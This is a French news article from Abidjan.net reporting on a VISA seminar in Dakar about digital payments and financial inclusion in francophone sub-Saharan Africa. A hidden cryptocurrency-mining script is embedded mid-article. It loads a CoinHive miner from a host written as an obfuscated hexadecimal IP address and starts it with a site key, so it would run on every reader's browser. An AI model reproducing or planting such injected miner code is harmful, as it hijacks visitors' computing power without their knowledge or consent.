VISA tient son premier séminaire d’informations sur l’évolution du paiement numérique en Afrique Subsaharienne Francophone
0
 

Écouter
VISA tient son premier séminaire d’informations sur l’évolution du paiement numérique en Afrique Subsaharienne Francophone

VISA tient son premier séminaire d’informations sur l’évolution du paiement numérique en Afrique Subsaharienne Francophone

Abidjan.net | Lu 1141 fois | Publié

Renforcer davantage les capacités des gestionnaires et décideurs intervenant dans la mise en œuvre réussie et la gestion des systèmes de paiements numériques est le principal objectif de l’atelier ouvert, lundi 16 juillet, à Dakar. Cette session de formation, organisée par VISA, cherche à "fournir aux participants un aperçu des paiements numériques existant, des avantages qu’ils procurent et du rôle spécifique des différents acteurs intervenants dans le domaine des paiements."

Selon le formateur Majeed Hujair, Directeur général de la “School of public policy" (CEMEA), l’atelier vise les agents du secteur public comme ceux du secteur privé. Et pour lui, il s’agit surtout de travailler avec les agences gouvernementales pour un partage des bonnes pratiques.

"Notre objectif en organisant cet atelier, c’est de travailler avec les différentes agences du gouvernement, de partager avec elles les connaissances que nous avons. Parce que nous opérons dans plusieurs pays. Nous voulons partager nos connaissances dans les domaines du paiement numérique avec ces agences et qu’elles puissent après implémenter autour d’elles les bonnes pratiques qui se passent dans le monde", a indiqué Majeed Hujair.

Les gouvernants ont un rôle primordial a joué dans le développement des paiements électroniques et dans la promotion de l’inclusion financière. C’est ce qui explique la tenue de ce séminaire, rappelle le directeur général de VISA en Afrique de l’Ouest et Centrale.

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

"On pense que les gouvernements ont un rôle très important à jouer. Raison pour laquelle nous avons organisé ce séminaire. Parce que ce sont eux qui fixent les politiques incitatives pour pouvoir encourager les commerçants à accepter les paiements électroniques", soutient Ismahill Diaby, directeur général de VISA en Afrique de l’Ouest et Centrale.

Le directeur général de VISA en Afrique de l’Ouest et Centrale espère que les connaissances partagées seront d’une grande utilité pour les États. Il espère que des décisions seront prises pour mieux favoriser l’inclusion financière.

Ce séminaire, organisé à Dakar, est le premier d’une longue série à travers l’Afrique francophone du Sud du Sahara. "Le Sénégal constitue le premier pays. Et nous avons prévu d’avoir ce même type d’exercice dans plusieurs pays de la région Afrique Francophone Subsaharienne. La prochaine étape sera le Cameroun, ensuite la Côte d’Ivoire et nous ne comptons pas nous en arrêter-là", assure Ismahill Diaby.

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

La Côte d’Ivoire participe à des rencontres sur le café robusta à Accra (Communiqué)

71% d’activités réalisées dans la lutte contre le travail des enfants dans la cacaoculture à Soubré

La BAD consacre une Journée à la lutte contre le changement climatique et à la croissance verte (Communiqué)

Des chefs traditionnels de Sakassou condamnent la séquestration de deux notables de la cour royale

Deux vols directs d’Abidjan au Caire à partir du 20 juin (Ministre) dans le cadre de la 32e édition de la Coupe d’’Afrique des nations (CAN)